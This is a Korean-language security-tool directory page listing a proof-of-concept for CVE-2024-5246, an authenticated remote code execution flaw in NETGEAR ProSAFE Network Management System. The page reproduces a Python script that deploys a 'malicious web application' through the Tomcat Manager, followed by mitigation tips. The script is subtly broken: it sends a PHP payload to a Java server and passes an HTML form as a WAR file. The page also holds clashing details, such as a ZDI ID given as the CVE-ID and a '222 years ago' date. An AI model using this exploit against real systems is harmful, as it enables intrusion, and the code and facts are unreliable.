Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-5246 — NETGEAR ProSAFE 네트워크 관리 시스템에서 취약한 Apache Tomcat을 통해 악성 웹 애플리케이션을 배포하여 인증된 원격 코드 실행을 시연하는 개념 증명 Python 스크립트. | Kitploit
도구/GitHubGitHub/abdurahmon3236/cve-2024-5246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

NETGEAR ProSAFE 네트워크 관리 시스템에서 취약한 Apache Tomcat을 통해 악성 웹 애플리케이션을 배포하여 인증된 원격 코드 실행을 시연하는 개념 증명 Python 스크립트.

저장소 보기
222년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

NETGEAR ProSAFE 네트워크 관리 시스템 원격 코드 실행(RCE) 취약점 PoC에 대한 구조화된 README.md입니다:


NETGEAR ProSAFE 네트워크 관리 시스템에서 원격 코드 실행(RCE)을 위한 개념 증명(PoC)

이 저장소는 NETGEAR ProSAFE 네트워크 관리 시스템에서 원격 코드 실행(RCE) 취약점을 시연하는 개념 증명(PoC) 스크립트를 포함하고 있습니다. 이 취약점은 제품 설치 프로그램 내에서 취약한 버전의 Apache Tomcat을 사용하기 때문에 발생합니다. 이 문제로 인해 인증된 공격자는 영향을 받는 설치 환경에서 임의 코드를 실행할 수 있습니다.

취약점 설명

CVE-ID: ZDI-CAN-22868

개요: NETGEAR ProSAFE 네트워크 관리 시스템은 취약한 버전의 Apache Tomcat을 사용하여 원격 코드 실행 취약점을 포함합니다. 인증된 공격자는 이 취약점을 악용하여 영향을 받는 시스템에서 SYSTEM 컨텍스트로 임의 코드를 실행할 수 있습니다.

영향을 받는 버전:

  • 취약한 Apache Tomcat 버전을 포함한 NETGEAR ProSAFE 네트워크 관리 시스템 버전.

인증: 필요

PoC 상세

이 PoC는 공격자가 취약점을 악용하여 원격 코드 실행을 달성하는 방법을 보여줍니다. 구체적인 결함은 오래되었거나 취약한 Apache Tomcat 버전을 사용하기 때문에 제품 설치 프로그램 내에 있습니다.

PoC 스크립트

다음 스크립트는 이 RCE 취약점을 악용하는 방법을 보여줍니다. 이 PoC를 실행하기 전에 적절한 권한이 있는지 확인하십시오.

중요: 이 PoC는 교육 목적으로만 제공되며 승인되지 않거나 악의적인 활동에 사용해서는 안 됩니다.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

설명

  1. 구성: target_url을 대상 시스템의 Tomcat Manager URL로 설정하고 username과 password를 유효한 자격 증명으로 업데이트하십시오.
  2. 페이로드: 페이로드는 코드 실행을 시연하기 위해 시스템 명령을 실행하는 간단한 PHP 스크립트입니다.
  3. 익스플로잇 함수: exploit_rce() 함수는 악성 웹 애플리케이션을 배포하기 위해 POST 요청을 보냅니다.
  4. 배포: 스크립트는 악성 페이로드로 새 웹 애플리케이션을 배포하고 결과를 출력합니다.

중요 고려 사항

  • 권한: 대상 시스템에서 이 취약점을 테스트할 명시적 권한이 있는지 확인하십시오. 승인되지 않은 테스트는 불법적이고 비윤리적입니다.
  • 테스트 환경: 프로덕션 시스템에 영향을 미치지 않도록 통제된 환경에서 테스트를 수행하십시오.
  • 윤리적 사용: 이 PoC를 책임감 있게 사용하고 승인된 상황에서만 사용하십시오.

완화 조치

이 취약점을 완화하려면 다음 단계를 따르십시오:

  1. Tomcat 업데이트: 취약점이 패치된 Apache Tomcat 버전으로 업그레이드하십시오.
  2. 액세스 보안: Tomcat Manager 및 기타 민감한 인터페이스가 안전하게 보호되고 승인된 사용자만 액세스할 수 있도록 하십시오.
  3. 구성 검토: 웹 애플리케이션 및 서버의 구성을 정기적으로 검토하고 강화하십시오.

이러한 단계를 따르면 NETGEAR ProSAFE 네트워크 관리 시스템의 RCE 취약점을 해결하고 전반적인 보안을 강화할 수 있습니다.


이 README.md는 설정 지침, 고려 사항 및 완화 조언을 포함하여 RCE 취약점에 대한 자세한 설명과 PoC 스크립트를 제공합니다.

도구 다운로드